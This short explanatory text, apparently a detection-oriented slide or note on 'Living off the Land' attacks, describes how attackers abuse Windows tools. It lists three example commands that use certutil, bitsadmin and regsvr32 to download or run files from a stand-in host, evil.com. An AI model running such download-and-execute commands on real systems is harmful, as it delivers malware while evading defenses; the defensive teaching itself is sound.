Living off the Land (LotL)

Detecting abuse of native tools: certutil, bitsadmin, regsvr32.

LotL Techniques

Attackers use legitimate Windows tools to avoid detection.

certutil.exe -urlcache -f http://evil.com/malware.exe

bitsadmin /transfer job http://evil.com/file.exe C:\temp\file.exe

regsvr32 /s /u /i:http://evil.com/script.sct scrobj.dll